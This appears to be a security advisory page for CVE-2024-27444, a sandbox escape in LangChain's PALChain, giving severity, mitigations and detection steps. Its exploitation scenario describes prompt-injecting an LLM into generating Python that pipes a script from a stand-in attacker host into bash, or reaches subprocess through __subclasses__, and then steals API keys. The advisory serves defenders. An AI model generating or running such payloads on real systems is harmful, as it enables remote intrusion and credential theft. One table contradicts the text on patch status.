AI Threat Alert
CVE-2024-27444: LangChain Experimental: RCE via Python sandbox escape
CRITICAL PoC AVAILABLE CISA: TRACK*CVE-2024-27444 is a critical RCE in LangChain's PALChain component that fully bypasses the prior patch for CVE-2023-44467 — a patch bypass on a known critical is a top priority. Any application using langchain-experimental for Python code generation and execution is exploitable by unauthenticated remote attackers with no user interaction required. Upgrade to langchain-experimental >= 0.1.8 immediately; if patching is blocked, disable PALChain entirely and isolate any LangChain workloads in hardened containers with no network egress.
What is the risk?
Severity is critical with CVSS 9.8 (AV:N/AC:L/PR:N/UI:N). The attack complexity is trivial — Python's dunder attribute escape techniques (__import__, __subclasses__, etc.) are well-documented and widely used in CTF and red team toolkits. The fact that this is a bypass of a prior fix (CVE-2023-44467) signals that the original patch was narrowly scoped and the root cause was not properly addressed. LangChain is pervasive in AI agent deployments, expanding the blast radius significantly. No evidence of active KEV listing as of enrichment date, but the low barrier to exploitation means weaponization is likely.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| LangChain | pip | — | No patch |
Do you use LangChain? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
PATCH
Upgrade langchain-experimental to >= 0.1.8 immediately. Verify via
pip show langchain-experimental. -
WORKAROUND
If patching is not immediately possible, audit all code for PALChain usage and disable it — replace with a sandboxed code execution environment (e.g., E2B, Docker subprocess with seccomp).
-
ISOLATE
Run all LangChain workloads in containers with no-new-privileges, dropped capabilities, and read-only filesystems. Block outbound network from the container unless strictly required.
-
DETECT
Search application logs for PALChain invocations containing
__import__,__subclasses__,__builtins__,__globals__,__mro__,__base__, or__bases__. Instrument PALChain inputs/outputs with a WAF or input validation layer. -
INVENTORY
Identify all internal services using langchain-experimental via SBOM or dependency scanning (Dependabot, Snyk, Grype).
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-27444?
CVE-2024-27444 is a critical RCE in LangChain's PALChain component that fully bypasses the prior patch for CVE-2023-44467 — a patch bypass on a known critical is a top priority. Any application using langchain-experimental for Python code generation and execution is exploitable by unauthenticated remote attackers with no user interaction required. Upgrade to langchain-experimental >= 0.1.8 immediately; if patching is blocked, disable PALChain entirely and isolate any LangChain workloads in hardened containers with no network egress.
Is CVE-2024-27444 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-27444, increasing the risk of exploitation.
How to fix CVE-2024-27444?
1. PATCH: Upgrade langchain-experimental to >= 0.1.8 immediately. Verify via `pip show langchain-experimental`. 2. WORKAROUND: If patching is not immediately possible, audit all code for PALChain usage and disable it — replace with a sandboxed code execution environment (e.g., E2B, Docker subprocess with seccomp). 3. ISOLATE: Run all LangChain workloads in containers with no-new-privileges, dropped capabilities, and read-only filesystems. Block outbound network from the container unless strictly required. 4. DETECT: Search application logs for PALChain invocations containing `__import__`, `__subclasses__`, `__builtins__`, `__globals__`, `__mro__`, `__base__`, or `__bases__`. Instrument PALChain inputs/outputs with a WAF or input validation layer. 5. INVENTORY: Identify all internal services using langchain-experimental via SBOM or dependency scanning (Dependabot, Snyk, Grype).
What systems are affected by CVE-2024-27444?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM pipelines with code execution, RAG pipelines with code generation, AI-powered developer tools.
What is the CVSS score for CVE-2024-27444?
CVE-2024-27444 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.77%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0049 Exploit Public-Facing Application AML.T0050 Command and Scripting Interpreter AML.T0053 AI Agent Tool Invocation Compliance Controls Affected
What are the technical details?
Original Advisory
langchain_experimental (aka LangChain Experimental) in LangChain before 0.1.8 allows an attacker to bypass the CVE-2023-44467 fix and execute arbitrary code via the __import__, __subclasses__, __builtins__, __globals__, __getattribute__, __bases__, __mro__, or __base__ attribute in Python code. These are not prohibited by pal_chain/base.py.
Exploitation Scenario
An adversary targeting an AI-powered application — such as a coding assistant, data analysis chatbot, or AI agent with tool-use — identifies that the backend uses LangChain's PALChain for natural language to code translation. The attacker crafts an input prompt that instructs the LLM to generate Python code leveraging `__import__('os').system('curl attacker.com/shell.sh | bash')` or uses `().__class__.__mro__[-1].__subclasses__()` to locate and invoke `subprocess.Popen` from the builtins. PALChain's base.py executes this code without blocking the restricted attributes, granting the attacker a remote shell on the host. From there the attacker pivots to exfiltrate Anthropic/OpenAI API keys from environment variables, access internal vector databases, or move laterally within the cloud environment.
Weaknesses (CWE)
CWE-749 — Exposed Dangerous Method or Function: The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
- [Architecture and Design] If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.
- [Architecture and Design, Implementation] Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be: Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting. accessible to all users restricted to a small set of privileged users prevented from being directly accessible at all
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References
- github.com/langchain-ai/langchain/commit/de9a6cdf163ed00adaf2e559203ed0a9ca2f1de7 Patch
- github.com/ARPSyndicate/cve-scores Exploit
- github.com/fkie-cad/nvd-json-data-feeds Exploit
- github.com/franzheffa/video-search-and-summarization-viize Exploit
- github.com/gil-feldman-glidetalk/video-search-and-summarization Exploit
- github.com/rmkraus/video-search-and-summarization Exploit
- github.com/zgimszhd61/llm-security-quickstart Exploit
Timeline
Related Vulnerabilities
CVE-2025-2828 10.0 LangChain RequestsToolkit: SSRF exposes cloud metadata
Same package: langchain CVE-2023-34541 9.8 LangChain: RCE via unsafe load_prompt deserialization
Same package: langchain CVE-2023-29374 9.8 LangChain: RCE via prompt injection in LLMMathChain
Same package: langchain CVE-2023-34540 9.8 LangChain: RCE via JiraAPIWrapper crafted input
Same package: langchain CVE-2023-36258 9.8 LangChain: unauthenticated RCE via code injection
Same package: langchain